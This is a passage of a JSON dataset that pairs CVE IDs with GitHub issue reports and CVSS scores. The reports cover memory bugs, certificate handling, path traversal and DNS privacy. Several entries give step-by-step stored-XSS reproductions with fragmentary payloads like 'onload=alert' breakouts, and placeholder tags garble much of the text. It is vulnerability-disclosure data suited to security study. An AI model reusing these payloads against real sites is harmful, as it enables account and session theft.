        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36316",
        "Issue_Url_old": "https://github.com/relic-toolkit/relic/issues/155",
        "Issue_Url_new": "https://github.com/relic-toolkit/relic/issues/155",
        "Repo_new": "relic-toolkit/relic",
        "Issue_Created_At": "2020-06-29T14:31:53Z",
        "description": "buffer overflow in PKCS NUMBERTAG signature verification. Actually besides the problems mentioned in NUMBERTAG there seems to be additional problems in the PKCS NUMBERTAG signature verification code that can lead to a buffer overflow attack. Although the variable APITAG is set according to prior knowledge on line NUMBERTAG URLTAG , it will actually be overwritten on line NUMBERTAG URLTAG by the call to APITAG . And because APITAG doesn't require that the padding is NUMBERTAG at least NUMBERTAG byte long NUMBERTAG long enough so that there'd be no extra trailing bytes after the hash value, the value of APITAG can be set to a really small number when given a malformed signature with really short padding. Then on line NUMBERTAG URLTAG it is possible to have APITAG to be a really large value, larger than the size of APITAG allocated on line NUMBERTAG URLTAG , which can lead to a buffer overflow. Similar problems of not requiring a padding with appropriate length was found in some other implementations before, and that can usually be exploited for signature forgery (like in Bleichenbacher's original attack URLTAG . However, in this case it will induce a buffer overflow instead because of how APITAG was used to calculate the size of a subsequent buffer write (though I suspect the variable result might be set to APITAG after line NUMBERTAG URLTAG . Here's a proof of concept code demonstrating the problem, which should give a Segmentation Fault upon the completion of the signature verification: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36317",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/78498",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/78498",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2020-10-28T19:14:36Z",
        "description": "String::retain allows safely creating invalid (non utf8) strings when abusing panic. While APITAG executes it may temporarily leave the String in an inconsistent state, in particular it may contain invalid utf8. This is safe because it restores this invariant before returning, but the caller may skip this by panicing inside the closure and catching the unwind it outside. This allows to create String s that are not utf8, breaking the library invariant without using ERRORTAG . For example the following will panic at the final assertion, while I would expect it to never fail when s has type String : ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36318",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/79808",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/79808",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2020-12-07T21:12:10Z",
        "description": "APITAG length NUMBERTAG underflow and bogus values from APITAG triggered by a certain sequence of APITAG APITAG APITAG APITAG APITAG This is my first bug report, so please correct me s if I miss anything : ) I use APITAG in a toy application ( URLTAG which is handling external reads in a loop, and does possible partial handling of the input. My pattern is I call reserve(N) before APITAG N times, then APITAG then doing some APITAG I noticed the app was behaving badly, and was able to generate a stand alone test case which shows the bug. The code is pretty boring and repetitive, so I put it at URLTAG to avoid spamming here. Just issue \"cargo run\" after cloning out that code, and look for the word \"BUG\" within the terminal output: According to the docs, APITAG on an empty APITAG should return None. Instead, this happens: CODETAG If I set the boolean \"do_reserve\" to be false, thus getting rid of all the APITAG calls, I get the expected behavior: CODETAG The same happens if I set \"do_make_contiguous\" to false as well so calling both I found this on Meta APITAG The below is the version I found it in, but thanks Steve Klabnik for also testing it on nightly and getting the same output. APITAG : ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36323",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/80335",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/80335",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2020-12-23T16:44:23Z",
        "description": "API soundness issue in APITAG implementation of Borrow APITAG ]. A weird Borrow implementation that returns a different result for each call can create a string with uninitialized bytes with APITAG URLTAG implementation of APITAG type. The problem is in APITAG URLTAG function NUMBERTAG The borrow result is first used for the length calculation. URLTAG NUMBERTAG Then, inside APITAG macro, the user provided slice is borrowed again and the content is copied. URLTAG NUMBERTAG Finally, the length of the slice is set to the length calculated in step NUMBERTAG URLTAG Playground link URLTAG , which demonstrates creating a non UTF NUMBERTAG string by only using safe Rust.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.2,
        "impactScore": 4.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36325",
        "Issue_Url_old": "https://github.com/akheron/jansson/issues/548",
        "Issue_Url_new": "https://github.com/akheron/jansson/issues/548",
        "Repo_new": "akheron/jansson",
        "Issue_Created_At": "2020-09-01T16:46:51Z",
        "description": "OOB Read memory corruption bug. Hi, I encountered an OOB read memory corruption bug when fuzzing Jansson. Below you can find the crash log: ./prog detect_leaks NUMBERTAG INFO: Seed NUMBERTAG INFO: Loaded NUMBERTAG modules NUMBERTAG inline NUMBERTAG bit counters NUMBERTAG a3f NUMBERTAG a3f9a), INFO: Loaded NUMBERTAG PC tables NUMBERTAG PCs NUMBERTAG c0), INFO: max_len is not provided; APITAG will not generate inputs larger than NUMBERTAG bytes INFO: A corpus is not provided, starting from an empty corpus NUMBERTAG INITED co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG NEW co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb L NUMBERTAG MS NUMBERTAG APITAG APITAG APITAG APITAG NUMBERTAG REDUCE co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb L NUMBERTAG MS NUMBERTAG APITAG NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG f4f NUMBERTAG b bp NUMBERTAG ffcf NUMBERTAG a NUMBERTAG sp NUMBERTAG ffcf NUMBERTAG T0) APITAG signal is caused by a READ memory access NUMBERTAG f NUMBERTAG f4f NUMBERTAG b in string_get PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG f3 in APITAG PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG in stream_get PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG in lex_get_save PATHTAG NUMBERTAG f NUMBERTAG f4f0a NUMBERTAG in lex_scan PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG da in APITAG PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG in json_loads PATHTAG NUMBERTAG dad3 in APITAG PATHTAG NUMBERTAG a1 in APITAG char const , unsigned long) ( PATHTAG NUMBERTAG de5 in APITAG char const , unsigned long, bool, APITAG , bool ) ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ad NUMBERTAG in APITAG APITAG >&) ( PATHTAG NUMBERTAG e in APITAG , char , int ( )(unsigned char const , unsigned long)) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG b2 in __libc_start_main PATHTAG NUMBERTAG e4dd in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in string_get NUMBERTAG ABORTING MS NUMBERTAG APITAG APITAG ; base unit: APITAG APITAG APITAG APITAG APITAG APITAG APITAG artifact_prefix='./'; Test unit written to ./crash APITAG Base NUMBERTAG APITAG APITAG The fuzzer I used was: include APITAG include APITAG int APITAG char Data, size_t Size) { FILE APITAG APITAG = fopen( PATHTAG \"w\"); json_t root; json_error_t error; root = APITAG NUMBERTAG error); json_dumpf(root, APITAG NUMBERTAG json_decref(root); APITAG return NUMBERTAG Kind Regards, Jordy Zomer",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36327",
        "Issue_Url_old": "https://github.com/rubygems/rubygems/issues/3982",
        "Issue_Url_new": "https://github.com/rubygems/rubygems/issues/3982",
        "Repo_new": "rubygems/rubygems",
        "Issue_Created_At": "2020-09-30T18:25:40Z",
        "description": "Global vs block rubygems source priority doesn't work as expected. In a situation like the following: CODETAG Bundler should try to resolve using the private source for my private gem and all of its indirect dependencies. Only if a valid resolution is not found, it should also consider APITAG for those dependencies. Insted, Bundle will still install APITAG from rubygems.org if the gem exists there. We should probably search first in the same source as APITAG before falling back. APITAG posted by MENTIONTAG in URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36364",
        "Issue_Url_old": "https://github.com/smartstore/SmartStoreNET/issues/2112",
        "Issue_Url_new": "https://github.com/smartstore/smartstorenet/issues/2112",
        "Repo_new": "smartstore/smartstorenet",
        "Issue_Created_At": "2020-10-08T12:36:16Z",
        "description": "Path Traversal Vulnerability. Hello Thanks for maintaining this open source project I would like to report a path traversal vulnerability similar to: URLTAG URLTAG In the APITAG URLTAG method, the APITAG user controlled input is not validated and an attacker can perform a path traversal attack to copy an arbitrary file into a new profil and delete the original file URLTAG . FILETAG Eric",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36365",
        "Issue_Url_old": "https://github.com/smartstore/SmartStoreNET/issues/2113",
        "Issue_Url_new": "https://github.com/smartstore/smartstorenet/issues/2113",
        "Repo_new": "smartstore/smartstorenet",
        "Issue_Created_At": "2020-10-08T15:05:56Z",
        "description": "Open redirect vulnerability in APITAG method. Hello This issue to address this open redirect vulnerability in the APITAG URLTAG method. Example: FILETAG Eric",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36367",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/135",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/135",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2019-05-28T07:23:36Z",
        "description": "APITAG stack overflow on recursive stack frames: parse_block, parse_statement, parse_statement_list. An issue was discovered in mjs.c NUMBERTAG Stack Exhaustion occurs in mjs_mk_string function, and there is a stack consumption problem caused by recursive stack frames POC: FILETAG ASAN output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36370",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/136",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/136",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2019-05-28T07:28:05Z",
        "description": "APITAG stack overflow on recursive stack frames: parse_unary, parse_mul_div_rem, parse_plus_minus.... POC: FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36395",
        "Issue_Url_old": "https://github.com/LavaLite/cms/issues/321",
        "Issue_Url_new": "https://github.com/lavalite/cms/issues/321",
        "Repo_new": "lavalite/cms",
        "Issue_Created_At": "2020-05-25T07:39:18Z",
        "description": "Cross Site Scripting Vulnerability on APITAG feature in Lavelite. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"security\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG NUMBERTAG Insert payload: FILETAG APITAG APITAG load=alert(/XSS/)// APITAG // \"> APITAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-36396",
        "Issue_Url_old": "https://github.com/LavaLite/cms/issues/322",
        "Issue_Url_new": "https://github.com/lavalite/cms/issues/322",
        "Repo_new": "lavalite/cms",
        "Issue_Created_At": "2020-05-25T07:50:11Z",
        "description": "Cross Site Scripting Vulnerability on APITAG & Permissions\" feature in Lavelite..",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-36397",
        "Issue_Url_old": "https://github.com/LavaLite/cms/issues/323",
        "Issue_Url_new": "https://github.com/lavalite/cms/issues/323",
        "Repo_new": "lavalite/cms",
        "Issue_Created_At": "2020-05-25T09:06:23Z",
        "description": "Cross Site Scripting Vulnerability on APITAG feature in Lavelite.. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Insert payload: FILETAG APITAG APITAG load=alert('XSS')// APITAG // \"> APITAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-36398",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/676",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/676",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-06-05T11:40:45Z",
        "description": "Cross Site Scripting Vulnerability on APITAG a campaign\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG a campaign\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Insert payload: FILETAG // \"> APITAG \"> APITAG NUMBERTAG Click APITAG and continue editing NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS. Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG Insert payload FILETAG Trigger XSS FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-36399",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/675",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/675",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-06-05T01:57:55Z",
        "description": "Cross Site Scripting Vulnerability on APITAG rules\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG administrators\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to \" URLTAG NUMBERTAG Click \"rule1\" edit infomation rule NUMBERTAG Insert payload: ' APITAG NUMBERTAG Click APITAG Changes NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS. Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Insert payload FILETAG Trigger XSS FILETAG FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-36421",
        "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3394",
        "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3394",
        "Repo_new": "mbed-tls/mbedtls",
        "Issue_Created_At": "2020-06-04T10:32:00Z",
        "description": "Leaking control flow APITAG attack). Description Type: Bug Priority: Minor Bug mbed TLS build: Version NUMBERTAG OS version: SGX Discoverers: Ivan Puddu, Moritz Schneider, Miro Haller, Srdjan Capkun, ETH Zurich (i.e., not me) Short description: The authors describe in their paper a way to determine control flow in SGX enclaves by precisely timing interrupt latency. This succeeds even in balanced branches such as: APITAG The root cause of this is that the front end of the processor fetches instructions with a NUMBERTAG byte well aligned window. The time to resume an instruction will depend on its location within this fetch window (and thus its virtual address) and instructions near it. Full description: URLTAG Solution: Remove the secret dependent branch altogether Code locations that require fixes: APITAG (bignum.c NUMBERTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36425",
        "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3340",
        "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3340",
        "Repo_new": "mbed-tls/mbedtls",
        "Issue_Created_At": "2020-05-21T12:50:03Z",
        "description": "It may not be necessary to check the \"revocation date\" . Description Type: Bug Bug OS ubuntu NUMBERTAG linux| mbed TLS build: Version NUMBERTAG I created a CRL whose revocation date is later than current time. APITAG does not use this CRL because it thought that the CRL is illegal (see the code in /library NUMBERTAG crt.c, line NUMBERTAG Comparatively, openssl does not check the \"revocation date\" field and revokes certificate(s). The openssl guys explained that \"revocation date\u201d is useless in certificate validation and may only be used as meta data (see URLTAG I indeed checked RFC NUMBERTAG and did not find any words saying that \"revocation date\" is important (for certificate parsing and validation). Then do we still need to check the revocation date? CODETAG The command I used is: APITAG The verification returns CODETAG Result of APITAG ERRORTAG root.pem CODETAG leaf.pem CODETAG test.crl CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36477",
        "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3498",
        "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3498",
        "Repo_new": "mbed-tls/mbedtls",
        "Issue_Created_At": "2020-07-17T10:10:04Z",
        "description": "Erroneous handling of IP address SANs. Description Type: Bug Priority: Minor mbed TLS build: Version: checked on NUMBERTAG and git NUMBERTAG f4f9a8da, likely occurs on all versions that support SAN Actual behavior APITAG URLTAG treats all kinds of Subject Alternative Names equivalently, even in cases where it does not make sense. In particular, IP address SANs are compared byte by byte with whatever the value of cn is and in the typical cases it is a hostname (specifically, in the case of normal APITAG operation, it's the value configured via APITAG ). It is possible, for example, for a certificate to exist with an IP address SAN for APITAG (a perfectly valid IP owned by Verizon in the US), which would erroneously match a hostname of APITAG (an actual Polish retailer's website). While unlikely, this is seems like a possibility for certificate spoofing. This also means that it is very difficult to handle connecting to a server that actually uses an IP address SAN in its certificate, as there is no way to pass an IP address to mbed TLS when connecting. Expected behavior I would expect IP address SANs to be either ignored or compared in a more appropriate way (e.g. stringified first, perhaps?)",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36478",
        "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3629",
        "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3629",
        "Repo_new": "mbed-tls/mbedtls",
        "Issue_Created_At": "2020-09-01T07:30:15Z",
        "description": "Certificate verification discrepancy between APITAG and mbed TLS. Description Type: Bug Priority: Unclear A verification discrepancy found with differential fuzzing. APITAG fails to verify APITAG against the APITAG CA cert whereas mbed TLS succeeds. This might be worth looking into as it could indicate a (security) bug. Bug OS linux mbed TLS build: Latest git checkout, default configuration. Peer device TLS stack and version Not applicable Expected behavior Verification fails Actual behavior Verification succeeds Steps to reproduce Compile and run: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36517",
        "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/6",
        "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/6",
        "Repo_new": "home-assistant/plugin-dns",
        "Issue_Created_At": "2020-10-09T08:33:09Z",
        "description": "DNS server settings ignored for resolving lan hosts.. APITAG release with the issue: Frontend > Configuration > Info CODETAG Or use this command: hass version APITAG Journal logs: CODETAG Description of problem: _TLDR : After some time (X hours) , HA stops using the user defined DNS server, thus no longer being able to resolve hosts on the LAN._ HA is configured to use a local DNS server : APITAG Trying to resolve a local host fails : ERRORTAG On the DNS server side, the logs show no request arriving for that lookup. APITAG the lookup to use the specific DNS server works : CODETAG And in this case, the DNS logging indeed confirms name resolution : APITAG Doing the same on the APITAG host works without ant kind of issue : CODETAG Additional info : Doing a ha dns restart solves the issue, for a while (X hours), but it always returns to being broken. I migrated to APITAG a month or NUMBERTAG ago, previously been running Hassio for a few years. In a Hassio setup, this issue _never_ happened. APITAG based setup has had this from my first install. Pleading for help on Discord yielded very little response, no useful response at all. Others are having the same issue, and are also being ignored : URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36517",
        "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/17",
        "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/17",
        "Repo_new": "home-assistant/plugin-dns",
        "Issue_Created_At": "2020-12-08T20:38:20Z",
        "description": "DNS Plugin is ignoring my local DNS on startup. I've noticed that when I power cycle my machine running APITAG that local DNS resolution doesn't work at all. Nearly all of my ESP NUMBERTAG devices rely upon local DNS resolution so most devices stop working. The local DNS is set via DHCP. I don't set any upstream DNS, everything is supposed to be forwarded through my local DNS. I've found that I can get it resolved by running ha dns restart at which point my local DNS server starts getting used. CODETAG I've got Hassio supervisor APITAG on stable channel APITAG NUMBERTAG deployment production).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36517",
        "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/22",
        "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/22",
        "Repo_new": "home-assistant/plugin-dns",
        "Issue_Created_At": "2021-01-18T12:01:39Z",
        "description": "Use of APITAG DNS, Privacy Breach. The APITAG module is Home assistant is using APITAG DNS over TLS by default. This is basically exfilling my private data to a commercial NUMBERTAG rd party without my permission. There is no currently no way to disable this functionality. The APITAG module also attempts to lookup IP NUMBERTAG AAAA records using APITAG when IP NUMBERTAG is disabled in the supervisor network configuration. Hardcoded DNS is a breach of privacy and trust, either remove it completely, or provide an option to disable it.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36517",
        "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/64",
        "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/64",
        "Repo_new": "home-assistant/plugin-dns",
        "Issue_Created_At": "2021-11-06T16:24:00Z",
        "description": "APITAG is misconfigured leading to unexpected healthcheck behaviour. APITAG is configured to healthcheck the Cloudflare fallback every NUMBERTAG minutes, however in practice, a check is performed once a minute (and retries are generated when it fails). This is also why users have reported seeing small packet storms when Cloudflare is not reachable (by MENTIONTAG here URLTAG and MENTIONTAG here URLTAG . The intended behaviour appears to be to check once every NUMBERTAG minutes CODETAG However, that is not the only check being performed, because the encompassing server block is referenced elsewhere CODETAG A check will be run once a minute against APITAG as well as the locals (if present). We can see this is the case by enabling coredns' prometheus endpoints and pointing telegraf at them FILETAG That's failures per minute each failure represents a single query (for APITAG ) sent to APITAG . However, to APITAG (and any other upstream for that matter) it's just another query, so when it's query to it's upstream (one of APITAG or APITAG ) fails, it retries and we end up with new packets hitting the wire, one after the other. In terms of the fix, it's not clear why the fallback behaviour is implemented/hardcoded in the first place (I couldn't find any architecture discussions on it in that repo, perhaps I missed them), but the correct way to have implemented this would be one of the following options Option NUMBERTAG not include APITAG in the forwards statement at all (as it's handled by the fallback). CODETAG (It'd need some logic to handle empty locals) Option NUMBERTAG Not use a separate server block CODETAG (perhaps there some other reason an entire separate server block was stood up, but I don't see any reference to it). You could also add some config to handle APITAG locally (so the healthcheck against APITAG isn't passed upstream), but that's more horrid than the current setup. Turning off healthchecks against the locals is likely to be undesirable due to then having to wait for coredns 's timeouts if a local does go down, so I've not included that The reason this isn't a PR is because it's blocked by a decision on approach. Additional Observations Whilst capturing telemetry there were a few things I noticed which might help inform a decision on the above When in use, the Cloudflare fallback introduces a significant level of latency: FILETAG At the network level, Cloudflare is only NUMBERTAG ms away, but the average query duration for CF upstreams is half a second. The presumption is that's due to APITAG overheads, but unfortunately coredns doesn't currently expose metrics that can help verify this. I'd posit therefore that as well as fixing the healthcheck issue The choice to have cloudflare enabled/disabled should be available to the user If mandatory, the choice to use 